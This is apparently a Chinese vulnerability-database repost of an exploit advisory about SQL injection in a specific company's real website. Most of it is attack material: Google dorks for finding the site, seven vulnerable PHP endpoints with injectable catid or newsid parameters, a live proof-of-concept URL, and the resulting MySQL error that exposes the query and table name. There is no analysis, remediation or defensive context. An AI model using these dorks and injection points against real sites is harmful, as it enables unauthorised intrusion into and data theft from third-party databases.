Investor Ningbo Liangzhu Culture Industrial Pack Development Management Co. Ltd. SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034835 漏洞类型
发布时间 2018-06-01 更新时间 2018-06-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060011
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : China Investor Ningbo Liangzhu Culture Industrial Pack Development Management Co. Ltd. SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 01/06/2018
# Vendor Homepage : nblztd.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork 1 : inurl:''/liangzhutd.php?catid=''

# Google Dork 2 : intext:''Investor:Ningbo Liangzhu Culture Industrial Pack Development Co.,Ltd. InvestmentConsultant:T&C Asset Management Consulting Ltd.,Eastern China Office''

# Exploit : /aboutus.php?catid=[SQL Injection]

# Exploit : /getto.php?catid=[SQL Injection]

# Exploit : /liangzhutd.php?catid=[SQL Injection]

# Exploit : /matingxm.php?catid=[SQL Injection]

# Exploit : /news.php?catid=[SQL Injection]

# Exploit : /news_detail.php?newsid=[SQL Injection]

# Exploit : /intolz.php?catid=[SQL Injection]

#################################################################################################

# Example Site =>   nblztd.com/aboutus.php?catid=14%27  => [ Proof of Concept for SQL Inj ] => archive.is/qdb3f

# SQL/DB Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''14''' at line 1

select id,name,keywords,description,phthurl,content from lz_pagecontent where id='14''

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################